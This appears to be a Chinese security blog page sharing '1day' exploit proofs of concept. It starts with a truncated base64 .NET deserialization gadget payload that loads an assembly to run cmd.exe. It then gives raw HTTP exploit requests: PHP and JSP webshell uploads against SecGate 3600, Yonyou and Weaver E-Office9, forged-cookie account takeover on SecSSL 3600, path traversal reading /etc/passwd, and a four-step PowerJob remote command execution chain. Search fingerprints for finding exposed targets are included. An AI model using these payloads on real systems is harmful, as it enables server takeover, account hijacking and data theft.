ZvAHNldF9GaWxlTmFtZQBIdHRwUmVxdWVzdABnZXRfUmVxdWVzdABTeXN0ZW0uQ29sbGVjdGlvb nMuU3BlY2lhbGl6ZWQATmFtZVZhbHVlQ29sbGVjdGlvbgBnZXRfSGVhZGVycwBnZXRfSXRlbQBT dHJpbmcAQ29uY2F0AHNldF9Bcmd1bWVudHMAc2V0X1JlZGlyZWN0U3RhbmRhcmRPdXRwdXQAc2V 0X1JlZGlyZWN0U3RhbmRhcmRFcnJvcgBzZXRfVXNlU2hlbGxFeGVjdXRlAFN0YXJ0AFN5c3RlbS 5JTwBTdHJlYW1SZWFkZXIAZ2V0X1N0YW5kYXJkT3V0cHV0AFRleHRSZWFkZXIAUmVhZFRvRW5kA FdyaXRlAEZsdXNoAEVuZABFeGNlcHRpb24AAAAPYwBtAGQALgBlAHgAZQAAB2MAbQBkAAAHLwBj ACAAAAAAAODxsDW2z09DrP9c0go3YuQACLd6XFYZNOCJAyAAAQQgAQEICLA/X38R1Qo6BAAAEhE EIAASFQQgABIZBCAAEiEEIAEBDgQgABIlBCAAEikEIAEODgUAAg4ODgQgAQECAyAAAgQgABIxAy AADggHBBIREh0ODggBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEAAADMJ gAAAAAAAAAAAADuJgAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4CYAAAAAAAAAAAAAAAAAAAAA AAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAI AAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAATAIAAAAAAAAAAAAATAI0AAAAVgBTAF8AVgBFA FIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8AAAAAAAAA BAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAA AAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBnAEYAaQBsAG UASQBuAGYAbwAAAIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAY wByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAw AC4AMAAuADAALgAwAAAAPAANAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAAB0ADIAZgB2AHo ANABpAGwALgBkAGwAbAAAAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIA AAAEQADQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAAB0ADIAZgB2AHoANABpA GwALgBkAGwAbAAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAA LgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAA uADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAANwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDwAAAB9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9 uSG9sZGVyAwAAAAREYXRhCVVuaXR5VHlwZQxBc3NlbWJseU5hbWUBAAEIBiEAAAD+AVN5c3RlbS 5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtL kJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJs aWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHk sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG 9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuM C4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQ AAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkx pbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUm VmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZ XV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rp b25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9 uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZT A4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY 0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAA CggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGV yZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy 5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ 3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29y bGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc 3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYD FbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyY WwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249 NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg 5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi 0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b 3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5 cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V 5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdW x0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uV HlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNL ZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTE AAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1 doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgV mVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2 MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx 0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAAB AYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV 2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBW ZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2Y xMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAA AABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAA ABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9r ZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY 9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcn kEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQd WJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAA AAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF 0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaX phdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZ XJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJ RgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAA JTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbG l6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ 2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEB AgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlA AAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC 4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW 1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBD dWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk +AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3 RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc 2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5l cmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N 5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZW N0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTe XN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNp b249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzR lMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLl R5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS 2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBD dWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk +AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeX N0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAAC gFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJp Yy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCw gQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY2 9ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Y jc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9y YDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXR yYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb2 49NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlM Dg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVy YWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1 uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZX JhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZ 5W5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFT eXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXN jb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj 1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU 3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtb U3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCw gUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00Lj⽹神 SecGate 3600 防⽕墙 obj_app_upfile 任意⽂件上传漏洞漏洞描述⽹神SecGate 3600防⽕墙obj_app_upfile接⼝存在各种⽂件上传漏洞，攻击者通过构造特殊请求包即可获取服务器权限漏洞影响⽹神SecGate 3600防⽕墙⽹络测绘fid="1Lh1LHi6yfkhiO83I59AYg=="漏洞复现出现漏洞的⽂件 webui/modules/object/app.mds代码中没有对⽂件调⽤进⾏鉴权，且⽂件上传路径为可访问路径，造成任意⽂件上传pocPOST /?g=obj_app_upfile HTTP/1.1 Host: Accept: */* Accept-Encoding: gzip, deflate Content-Length: 574 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWn AxbcBBQc User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4. 0) ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="MAX_FILE_SIZE" 10000000 ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="upfile"; filename="vulntest.php" Content-Type: text/plain <?php system("id");unlink(__FILE__);?> ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="submit_post" obj_app_upfile ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="__hash__" 0b9d6b1ab7479ab69d9f71b05e0e9445 ------WebKitFormBoundaryJpMyThWnAxbcBBQc--默认上传路径 /secgate/webui/attachments/ ，访问attachments/xxx.php⽂件⽹神 SecSSL 3600安全接⼊⽹关系统未授权访问漏洞漏洞描述⽹神 SecSSL 3600安全接⼊⽹关系统存在未授权访问漏洞，攻击者通过漏洞可以获取⽤户列表，并修改⽤户账号密码漏洞影响⽹神 SecSSL 3600安全接⼊⽹关系统⽹络测绘app="安全接⼊⽹关SecSSLVPN"漏洞复现登陆⻚⾯验证POC，获取⽤户列表zkecGET /admin/group/x_group.php?id=2 Cookie: admin_id=1; gw_admin_ticket=1;修改⽤户密码POST /changepass.php?type=2 Cookie: admin_id=1; gw_user_ticket=fffffffffff fffffffffffffffffffff; last_step_param={"this_name":"ceshi","subAuthI d":"1"} old_pass=&password=Asd123!@#123A&repassword=Asd123!@#123A⽤友移动管理系统 uploadApk.do 任意⽂件上传漏洞漏洞描述⽤友移动管理系统 uploadApk.do 接⼝存在任意⽂件上传漏洞，攻击者通过漏洞可以获取服务器权限漏洞影响⽤友移动管理系统⽹络测绘app="⽤友-移动系统管理"漏洞复现登陆⻚⾯验证POCPOST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3 UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7 Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server Connection: close ------ WebKitFormBoundaryvLTG6zlX0gZ8LzO3 Content-Disposition: form-data; name="downloadpath"; filename="a.jsp" Content-Type: application/msword hello ------ WebKitFormBoundaryvLTG6zlX0gZ8LzO3--/maupload/apk/a.jsp泛微 OA E-Office9 任意文件上传描述和影响范围Weaver E-Office9版本存在代码问题漏洞，该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题，对参数Filedata的操作会导致不受限制的上传。Weaver E-Office9.0POC or EXPPOST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: 192.168.232.137:8082 User-Agent: test Connection: close Content-Length: 493 Accept-Encoding: gzip Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 Content-Disposition: form-data; name="Filedata"; filename="666.php" Content-Type: application/octet-stream <?php phpinfo();?> --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85-- --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 Content-Disposition: form-data; name="file"; filename="" Content-Type: application/octet-stream --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--绿盟sas安全审计系统任意文件读取漏洞POC/webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd
- 2023年08月10日
- 8 阅读
- 0 评论
- 0 点赞
2023-08-09
2023HW情报-1day-CVE-2023-37754 漏洞编号：CVE-2023-37754漏洞类型：远程代码执行影响：接管服务器简述：PowerJob是全新一代分布式调度与计算框架，能让您轻松完成作业的调度与繁杂任务的分布式计算。PowerJob存在远程命令执行漏洞，未授权的攻击者可以在PowerJob 上执行任意命令，甚至接管服务器。影响版本：PowerJob <= 4.3.3系统首页第一步创建执行命令的任务 POST /job/save HTTP/2 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Content-Type: application/json; charset=utf-8 Content-Length: 148 {"jobName":"test", "appId":1, "processorInfo":"whoami", "executeType":"STANDALONE", "processorType":"SHELL", "timeExpressionType": "API"}第二步查询任务的id POST /job/list HTTP/1.1 Host: x.x.x.x:30001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/json; charset=utf-8 Content-Length: 58 {"appId": 1, "index": 0, "pageSize": 1, "keyword": "test"}第三步执行任务 GET /job/run?jobId=214&appId=1 HTTP/1.1 Host: x.x.x.x:30001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/json; charset=utf-8第四步查询结果 GET /instance/detail?instanceId=568446119974012224 HTTP/1.1 Host: x.x.x.x:30001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close最后删除创建的任务
- 2023年08月09日
- 87 阅读
- 0 评论
- 0 点赞

1
2
3

月影

85 文章数

101 评论量

从推背图看华夏历史
未授权访问集合
六壬小记-找人

人生倒计时

舔狗日记

已运行 00 天 00 时 00 分 00 秒

沪ICP备2023039113号